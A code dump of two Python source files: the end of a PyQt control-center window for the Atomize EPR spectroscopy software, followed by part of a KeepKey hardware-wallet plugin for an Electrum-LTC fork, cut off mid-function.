pw.setImage(image, pos=(x0, y0), scale=(dx, dy), axes={'y':0, 'x':1})
else:
pw.setAxisLabels(xname=xnam, xscale =xscal, yname=ynam, yscale =yscal)
pw.setImage(image, axes={'y':0, 'x':1})
elif operation == 'label':
pw.setTitle(meta['value'])
def add_new_plot(self, rank, name):
pw = widgets.get_widget(rank, name)
self.add_plot(pw)
self.namelist[name] = pw
return pw
def add_plot(self, pw):
self.insert_dock_right = not self.insert_dock_right
self.dockarea.addDock(pw, position=['bottom', 'bottom'][self.insert_dock_right])
#print(['bottom', 'right'][self.insert_dock_right])
#self.dockarea.moveDock(pw, 'above', self.dock_list[-1]) ## move d6 to stack on top of d4
#####################################################
def _on_destroyed(self):
"""
A function to do some actions when the main window is closing.
"""
self.process_python.close()
self.process_pulse.close()
self.process_osc.close()
self.process_dig.close()
self.process_mw.close()
self.process_temp.close()
self.process_t2.close()
self.process_t1.close()
self.process_echo.close()
self.process_laser.close()
self.process_eseem.close()
self.process_tune.close()
self.process_awg.close()
self.process_fft.close()
self.process_phasing.close()
self.process_awg_phasing.close()
def quit(self):
"""
A function to quit the programm
"""
self.process_python.terminate()
self.process_pulse.terminate()
self.process_osc.terminate()
self.process_dig.terminate()
self.process_mw.terminate()
self.process_temp.terminate()
self.process_t2.terminate()
self.process_t1.terminate()
self.process_echo.terminate()
self.process_laser.terminate()
self.process_eseem.terminate()
self.process_tune.terminate()
self.process_awg.terminate()
self.process_fft.terminate()
self.process_phasing.terminate()
self.process_awg_phasing.terminate()
sys.exit()
####
#### QProcess: Destroyed while process ("python3") is still running.
####
def clear_errors(self):
self.text_errors.clear()
def start_experiment(self):
"""
A function to run an experimental script using python.exe.
"""
if self.script != '':
stamp = os.stat(self.script).st_mtime
else:
self.text_errors.appendPlainText('No experimental script is opened')
return
if self.checkTests.checkState() == 2:
self.test()
exec_code = self.process.waitForFinished( msecs = self.test_timeout ) # timeout in msec
elif self.checkTests.checkState() == 0:
self.test_flag = 0
exec_code = True
self.text_errors.appendPlainText("Testing of experimental scripts are disabled")
if self.test_flag == 1:
self.text_errors.appendPlainText("Experiment cannot be started, since test is not passed. Test execution timeout is " +\
str( self.test_timeout / 60000 ) + " minutes")
return # stop current function
elif self.test_flag == 0 and exec_code == True:
self.process_python.setArguments([self.script])
self.process_python.start()
def start_awg_phasing(self):
"""
A function to run online awg phase cycling.
"""
self.process_awg_phasing.setArguments(['atomize/control_center/awg_phasing.py'])
self.process_awg_phasing.start()
def start_phasing(self):
"""
A function to run online phase cycling.
"""
self.process_phasing.setArguments(['atomize/control_center/phasing.py'])
self.process_phasing.start()
def start_fft_control(self):
"""
A function to run an pulse_creator.
"""
self.process_fft.setArguments(['atomize/control_center/fft_control.py'])
self.process_fft.start()
def start_awg_control(self):
"""
A function to run an pulse_creator.
"""
self.process_awg.setArguments(['atomize/control_center/awg_creator.py'])
self.process_awg.start()
def start_pulse_control(self):
"""
A function to run an pulse_creator.
"""
self.process_pulse.setArguments(['atomize/control_center/pulse_creator.py'])
self.process_pulse.start()
def start_osc_control(self):
"""
A function to run an Keysight control.
"""
self.process_osc.setArguments(['atomize/control_center/osc_control.py'])
self.process_osc.start()
def start_dig_control(self):
"""
A function to run an Keysight control.
"""
self.process_dig.setArguments(['atomize/control_center/dig_control.py'])
self.process_dig.start()
def start_mw_control(self):
"""
A function to run an Keysight control.
"""
self.process_mw.setArguments(['atomize/control_center/mw_bridge_control.py'])
self.process_mw.start()
def start_temp_control(self):
"""
A function to run an Keysight control.
"""
self.process_temp.setArguments(['atomize/control_center/temp_control.py'])
self.process_temp.start()
def start_t2_preset(self):
self.process_t2.setArguments(['atomize/control_center/t2_preset.py'])
self.process_t2.start()
def start_t1_preset(self):
self.process_t1.setArguments(['atomize/control_center/t1_preset.py'])
self.process_t1.start()
def start_laser_preset(self):
self.process_laser.setArguments(['atomize/control_center/laser_preset.py'])
self.process_laser.start()
def start_echo_preset(self):
self.process_echo.setArguments(['atomize/control_center/echo_det_preset.py'])
self.process_echo.start()
def start_eseem_preset(self):
self.process_eseem.setArguments(['atomize/control_center/eseem_preset.py'])
self.process_eseem.start()
def start_tune_preset(self):
self.process_tune.setArguments(['atomize/control_center/tune_preset.py'])
self.process_tune.start()
def script_open_combo(self):
self.script = self.text_to_script_name( self.script_chooser.currentText() )
self.open_file( self.script )
def text_to_script_name(self, text_to_parse):
if text_to_parse == ' Tuning':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/01_resonator_tuning.py')
elif text_to_parse == ' T2':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/02_t2.py')
elif text_to_parse == ' T2 Baseline':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/02_t2_baseline.py')
elif text_to_parse == ' T1 Baseline':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/04_t1_inversion_recovery.py')
elif text_to_parse == ' T1':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/04_t1_inversion_recovery_baseline.py')
elif text_to_parse == ' Echo Detected':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/03_echo_detected_spectrum.py')
elif text_to_parse == ' Echo Detected 2D':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/03_echo_detected_spectrum_baseline_2d.py')
elif text_to_parse == ' Echo Detected Baseline':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/03_echo_detected_spectrum_baseline.py')
elif text_to_parse == ' Laser ED':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/14_laser_echo_detected_spectrum_baseline.py')
elif text_to_parse == ' Laser ED 2D':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/14_laser_echo_detected_spectrum_baseline_2D.py')
elif text_to_parse == ' Laser Kinetics':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/14_laser_echo_detected_spectrum_baseline_kinetics.py')
elif text_to_parse == ' ESEEM':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/07_eseem_phase.py')
elif text_to_parse == ' Nutations':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/05_nutations.py')
elif text_to_parse == ' HYSCORE':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/08_hyscore.py')
elif text_to_parse == ' SIFTER':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/10_sifter.py')
elif text_to_parse == ' DQC':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/11_dqc.py')
elif text_to_parse == ' DEER':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/awg/digitizer/02_deer_64_steps_phase_8ns_cylces.py')
elif text_to_parse == ' DEER Static':
return os.path.join(self.path_to_main, 'atomize/tests/pulse_epr/awg//01_deer_static.py')
def message_box_clicked(self, btn):
"""
Message Box fow warning
"""
if btn.text() == "Discrad and Run Experiment":
self.start_experiment()
elif btn.text() == "Update Script":
self.reload()
else:
return
def test(self):
"""
A function to run script check.
"""
if self.script != '':
stamp = os.stat(self.script).st_mtime
else:
self.text_errors.appendPlainText('No experimental script is opened')
return
if stamp != self.cached_stamp and self.flag_opened_script_changed == 1:
self.cached_stamp = stamp
message = QMessageBox(self); # Message Box for warning of updated file
message.setWindowTitle("Your script has been changed!")
message.setStyleSheet("QWidget { background-color : rgb(42, 42, 64); color: rgb(211, 194, 78); }")
message.addButton(QtWidgets.QPushButton('Discrad and Run Experiment'), QtWidgets.QMessageBox.YesRole)
message.addButton(QtWidgets.QPushButton('Update Script'), QtWidgets.QMessageBox.NoRole)
message.setText("Your experimental script has been changed ");
message.show();
message.buttonClicked.connect(self.message_box_clicked) # connect function clicked to button; get the button name
return # stop current function
#self.text_errors.appendPlainText("Testing... Please, wait!")
#self.process.setArguments(['--errors-only', self.script])
self.process.setArguments([self.script, 'test'])
self.process.start()
def reload(self):
"""
A function to reload an experimental script.
"""
self.cached_stamp = os.stat(self.script).st_mtime
text = open(self.script).read()
self.textEdit.setPlainText(text)
def on_finished_checking(self):
"""
A function to add the information about errors found during syntax checking
to a dedicated text box in the main window of the programm.
"""
#text = self.process.readAllStandardOutput().data().decode()
#if text == '':
# self.text_errors.appendPlainText("No errors are found!")
#else:
# self.text_errors.appendPlainText(text)
# self.text_errors.verticalScrollBar().setValue(self.text_errors.verticalScrollBar().maximum())
# Version for real tests
text = self.process.readAllStandardOutput().data().decode()
text_errors_script = self.process.readAllStandardError().data().decode()
if text_errors_script == '':
# if text == '' and text_errors_script == '':
self.text_errors.appendPlainText("No errors are found")
self.test_flag = 0
elif text_errors_script != '':
self.test_flag = 1
self.text_errors.appendPlainText(text_errors_script)
#self.text_errors.verticalScrollBar().setValue(self.text_errors.verticalScrollBar().maximum())
def on_finished_script(self):
"""
A function to add the information about errors found during syntax checking to a dedicated text box in the main window of the programm.
"""
text = self.process_python.readAllStandardOutput().data().decode()
text_errors_script = self.process_python.readAllStandardError().data().decode()
if text_errors_script == '':
#if text == '' and text_errors_script == '':
self.text_errors.appendPlainText("Script done!")
elif text_errors_script != '':
self.text_errors.appendPlainText("Script done!")
self.text_errors.appendPlainText(text_errors_script)
#self.text_errors.verticalScrollBar().setValue(self.text_errors.verticalScrollBar().maximum())
def help(self):
"""
A function to open a documentation
"""
pass
def edit_file(self):
"""
A function to open an experimental script in a text editor.
"""
if self.system == 'Linux':
if self.editor =='nano':
self.process_text_editor.setArguments(['-e','nano', self.script])
elif self.editor == 'vi':
self.process_text_editor.setArguments(['-e','vi', self.script])
else:
self.process_text_editor.setArguments([self.script])
elif self.system == 'Windows':
self.process_text_editor.setArguments([self.script])
self.process_text_editor.start()
def open_file(self, filename):
"""
A function to open an experimental script.
:param filename: string
"""
self.cached_stamp = os.stat(filename).st_mtime
text = open(filename).read()
self.path = os.path.dirname(filename) # for memorizing the path to the last used folder
self.script = filename
self.textEdit.setPlainText(text)
# scroll to Experimental parameters
QtCore.QTimer.singleShot(0, lambda: self.textEdit.verticalScrollBar().setValue(9))
self.label_filename.setText( str( self.script ) )
def save_file(self, filename):
"""
A function to save a new experimental script.
:param filename: string
"""
with open(filename, 'w') as file:
file.write(self.textEdit.toPlainText())
self.cached_stamp = os.stat(filename).st_mtime
self.script = filename
def open_file_dialog(self):
"""
A function to open a new window for choosing an experimental script.
"""
filedialog = QFileDialog(self, 'Open File', directory = self.path, filter = "python (*.py)",\
options = QtWidgets.QFileDialog.DontUseNativeDialog)
# use QFileDialog.DontUseNativeDialog to change directory
filedialog.setStyleSheet("QWidget { background-color : rgb(42, 42, 64); color: rgb(211, 194, 78);}")
filedialog.setFileMode(QtWidgets.QFileDialog.AnyFile)
filedialog.fileSelected.connect(self.open_file)
filedialog.show()
def save_file_dialog(self):
"""
A function to open a new window for choosing a name for a new experimental script.
"""
filedialog = QFileDialog(self, 'Save File', directory = self.path, filter = "python (*.py)",\
options = QtWidgets.QFileDialog.DontUseNativeDialog)
filedialog.setAcceptMode(QFileDialog.AcceptSave)
# use QFileDialog.DontUseNativeDialog to change directory
filedialog.setStyleSheet("QWidget { background-color : rgb(42, 42, 64); color: rgb(211, 194, 78);}")
filedialog.setFileMode(QtWidgets.QFileDialog.AnyFile)
filedialog.fileSelected.connect(self.save_file)
filedialog.show()
def save_edited_text(self):
if self.script:
self.flag_opened_script_changed = 1
with open(self.script, 'w') as file:
file.write(self.textEdit.toPlainText())
self.cached_stamp = os.stat(self.script).st_mtime
else:
self.flag_opened_script_changed = 1
if self.textEdit.toPlainText() != '': # save file dialog will be opened after at least one character is added
self.save_file_dialog()
@QtCore.pyqtSlot(str)
def add_error_message(self, data):
"""
A function for adding an error message to a dedicated text box in the main window of the programm;
This function runs when Helper.changedSignal.emit(str) is emitted.
:param data: string
"""
self.text_errors.appendPlainText(str(data))
if data == 'Script stopped':
#path_to_main = os.path.abspath(os.getcwd())
lib_path = os.path.join(self.path_to_main, 'atomize/general_modules', 'libspinapi.so')
lib_path2 = os.path.join(self.path_to_main, 'atomize/general_modules', 'spinapi64.dll')
if os.path.exists(lib_path) == False and os.path.exists(lib_path2) == False:
self.process_python.close()
else:
# check on windows?!
import atomize.device_modules.PB_ESR_500_pro as pb_pro
pb = pb_pro.PB_ESR_500_Pro()
pb.pulser_stop()
self.process_python.terminate()
# AWG
hCard1 = spcm_hOpen (create_string_buffer (b'/dev/spcm0'))
spcm_dwSetParam_i32 (hCard1, SPC_M2CMD, M2CMD_CARD_STOP)
# clean up
spcm_vClose (hCard1)
hCard2 = spcm_hOpen (create_string_buffer (b'/dev/spcm1'))
spcm_dwSetParam_i32 (hCard2, SPC_M2CMD, M2CMD_CARD_STOP)
# clean up
spcm_vClose (hCard2)
###
class NameList(QDockWidget):
def __init__(self, window):
super(NameList, self).__init__('Current Plots:')
#directories
self.path_to_main = os.path.abspath( os.getcwd() )
# configuration data
path_config_file = os.path.join(self.path_to_main, 'atomize/config.ini')
config = configparser.ConfigParser()
config.read(path_config_file)
# directories
self.open_dir = str(config['DEFAULT']['open_dir'])
self.namelist_model = QStandardItemModel()
self.namelist_view = QListView()
self.namelist_view.setModel(self.namelist_model)
self.setWidget(self.namelist_view)
self.window = window
self.plot_dict = {}
self.namelist_view.doubleClicked.connect(self.activate_item)
self.namelist_view.setContextMenuPolicy(QtConst.ActionsContextMenu)
delete_action = QAction("Delete Selected", self.namelist_view)
###
pause_action = QAction("Stop Script", self.namelist_view)
delete_action.triggered.connect(self.delete_item)
pause_action.triggered.connect(self.pause)
self.namelist_view.addAction(delete_action)
self.namelist_view.addAction(pause_action)
open_action = QAction('Open 1D Data', self)
open_action.triggered.connect(self.file_dialog) #self.open_file_dialog_1
self.namelist_view.addAction(open_action)
open_action_2 = QAction('Open 2D Data', self)
open_action_2.triggered.connect(self.file_dialog_2d) #self.open_file_dialog_2
self.namelist_view.addAction(open_action_2)
def open_file(self, filename):
"""
A function to open 1d data.
:param filename: string
"""
file_path = filename
header_array = []
header = 0
file_to_read = open(filename, 'r')
for i, line in enumerate(file_to_read):
if i is header: break
temp = line.split("#")
header_array.append(temp)
file_to_read.close()
temp = np.genfromtxt(file_path, dtype = float, delimiter = ',', skip_header = 0)
data = np.transpose(temp)
name_plot = datetime.now().strftime('%d-%m-%Y %H:%M:%S')
pw = self.window.add_new_plot(1, name_plot)
if len(data) == 2:
pw.plot(data[0], data[1], parametric = True, name = file_path, xname = 'X', xscale = 'Arb. U.',\
yname = 'Y', yscale = 'Arb. U.', label = 'Data_1', scatter = 'False')
elif len(data) == 3:
pw.plot(data[0], data[1], parametric = True, name = file_path + '_1', xname = 'X', xscale = 'Arb. U.',\
yname = 'Y', yscale = 'Arb. U.', label = 'Data_1', scatter = 'False')
pw.plot(data[0], data[2], parametric = True, name = file_path + '_2', xname = 'X', xscale = 'Arb. U.',\
yname = 'Y', yscale = 'Arb. U.', label = 'Data_2', scatter = 'False')
def open_file_2d(self, filename):
"""
A function to open 2d data
:param filename: string
"""
file_path = filename
header_array = []
header = 0
header_array = []
file_to_read = open(file_path, 'r')
for i, line in enumerate(file_to_read):
if i is header: break
temp = line.split("#")
header_array.append(temp)
file_to_read.close()
temp = np.genfromtxt(file_path, dtype = float, delimiter = ',', skip_header = 0)
data = temp
name_plot = datetime.now().strftime('%d-%m-%Y %H:%M:%S')
pw = self.window.add_new_plot(2, name_plot)
pw.setAxisLabels(xname = 'X', xscale = 'Arb. U.',yname = 'X', yscale = 'Arb. U.',\
zname = 'X', zscale = 'Arb. U.')
pw.setImage(data, axes = {'y': 0, 'x': 1})
# unused
def open_file_dialog(self, directory = '', header = 0):
pass
# For Tkinter Open 1D; Unused
# file_path = self.file_dialog(directory = directory)
#header_array = [];
#file_to_read = open(file_path, 'r')
#for i, line in enumerate(file_to_read):
# if i is header: break
# temp = line.split("#")
# header_array.append(temp)
#file_to_read.close()
#temp = np.genfromtxt(file_path, dtype = float, delimiter = ',', skip_header = 0)
#data = np.transpose(temp)
#name_plot = datetime.now().strftime('%d-%m-%Y %H:%M:%S')
#pw = self.window.add_new_plot(1, name_plot)
#if len(data) == 2:
# pw.plot(data[0], data[1], parametric = True, name = file_path, xname = 'X', xscale = 'Arb. U.',\
# yname = 'Y', yscale = 'Arb. U.', label = 'Data_1', scatter = 'False')
#elif len(data) == 3:
# pw.plot(data[0], data[1], parametric = True, name = file_path + '_1', xname = 'X', xscale = 'Arb. U.',\
# yname = 'Y', yscale = 'Arb. U.', label = 'Data_1', scatter = 'False')
# pw.plot(data[0], data[2], parametric = True, name = file_path + '_2', xname = 'X', xscale = 'Arb. U.',\
# yname = 'Y', yscale = 'Arb. U.', label = 'Data_2', scatter = 'False')
# unused
def open_file_dialog_2(self, directory = '', header = 0):
pass
# For Tkinter Open 1D; Unused
#file_path = self.file_dialog(directory = directory)
#header_array = []
#file_to_read = open(file_path, 'r')
#for i, line in enumerate(file_to_read):
# if i is header: break
# temp = line.split("#")
# header_array.append(temp)
#file_to_read.close()
#temp = np.genfromtxt(file_path, dtype = float, delimiter = ',', skip_header = 0)
#data = temp
#name_plot = datetime.now().strftime('%d-%m-%Y %H:%M:%S')
#pw = self.window.add_new_plot(2, name_plot)
#pw.setAxisLabels(xname = 'X', xscale = 'Arb. U.',yname = 'X', yscale = 'Arb. U.',\
# zname = 'X', zscale = 'Arb. U.')
#pw.setImage(data, axes = {'y': 0, 'x': 1})
def file_dialog(self, directory = ''):
"""
A function to open a new window for choosing 1d data
"""
filedialog = QFileDialog(self, 'Open File', directory = self.open_dir, filter = "CSV (*.csv)", \
options = QtWidgets.QFileDialog.DontUseNativeDialog )
# options = QtWidgets.QFileDialog.DontUseNativeDialog
# use QFileDialog.DontUseNativeDialog to change directory
filedialog.setStyleSheet("QWidget { background-color : rgb(42, 42, 64); color: rgb(211, 194, 78);}")
filedialog.setFileMode(QtWidgets.QFileDialog.AnyFile)
filedialog.fileSelected.connect(self.open_file)
filedialog.show()
# Tkinter Open 1D data
#root = tkinter.Tk()
#s = ttk.Style().theme_use('alt')
#root.withdraw()
#file_path = filedialog.askopenfilename(**dict(
# initialdir = self.open_dir,
# filetypes = [("CSV", "*.csv"), ("TXT", "*.txt"),\
# ("DAT", "*.dat"), ("all", "*.*")],
# title = 'Select file to open')
# )
#return file_path
def file_dialog_2d(self, directory = ''):
"""
A function to open a new window for choosing 2D data
"""
filedialog = QFileDialog(self, 'Open File', directory = self.open_dir, filter = "CSV (*.csv)")
#options = QtWidgets.QFileDialog.DontUseNativeDialog
# use QFileDialog.DontUseNativeDialog to change directory
filedialog.setStyleSheet("QWidget { background-color : rgb(42, 42, 64); color: rgb(211, 194, 78);}")
filedialog.setFileMode(QtWidgets.QFileDialog.AnyFile)
filedialog.fileSelected.connect(self.open_file_2d)
filedialog.show()
def activate_item(self, index):
item = self.namelist_model.itemFromIndex(index)
plot = self.plot_dict[str(item.text())]
if plot.closed:
plot.closed = False
self.window.add_plot(plot)
def delete_item(self):
index = self.namelist_view.currentIndex()
item = self.namelist_model.itemFromIndex(index)
del self[str(item.text())]
def pause(self):
sock = socket.socket()
sock.connect(('localhost', 9091))
sock.send(b'Script stopped')
sock.close()
def __getitem__(self, item):
return self.plot_dict[item]
def __setitem__(self, name, plot):
model = QStandardItem(name)
model.setEditable(False)
self.namelist_model.appendRow(model)
self.plot_dict[name] = plot
def __contains__(self, value):
return value in self.plot_dict
def __delitem__(self, name):
self.namelist_model.removeRow(self.namelist_model.findItems(name)[0].index().row())
self.plot_dict[name].close()
del self.plot_dict[name]
def keys(self):
return list( self.plot_dict.keys() )
def main():
"""
A function to run the main window of the programm.
"""
app = QtWidgets.QApplication(sys.argv)
main = MainWindow()
helper = socket_server.Helper()
server = socket_server.Socket_server()
# to connect a function add_error_message when the signal from the helper will be emitted.
helper.changedSignal.connect( main.add_error_message, QtCore.Qt.QueuedConnection )
threading.Thread( target = server.start_messenger_server, args = (helper,), daemon = True ).start()
main.show()
sys.exit( app.exec_() )
if __name__ == '__main__':
main()
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_ltc.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_ltc.bip32 import BIP32Node
from electrum_ltc import constants
from electrum_ltc.i18n import _
from electrum_ltc.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_ltc.keystore import Hardware_KeyStore
from electrum_ltc.plugin import Device
from electrum_ltc.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
import usb1
from .client import KeepKeyClient
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
plugin: 'KeepKeyPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
# only "register" hid device id:
self.device_manager().register_devices(keepkeylib.transport_hid.DEVICE_IDS, plugin=self)
# for webusb transport, use custom enumerate function:
self.device_manager().register_enumerate_func(self.enumerate)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def enumerate(self):
from keepkeylib.transport_webusb import WebUsbTransport
results = []
for dev in WebUsbTransport.enumerate():
path = self._dev_to_str(dev)
results.append(Device(path=path,
interface_number=-1,
id_=path,
product_key=(dev.getVendorID(), dev.getProductID()),
usage_page=0,
transport_ui_string=f"webusb:{path}"))
return results
@staticmethod
def _dev_to_str(dev: "usb1.USBDevice") -> str:
return ":".join(str(x) for x in ["%03i" % (dev.getBusNumber(),)] + dev.getPortNumberList())
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for dev in WebUsbTransport.enumerate():
if device.path == self._dev_to_str(dev):
return WebUsbTransport(dev)
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['KeepKeyClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Viacoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
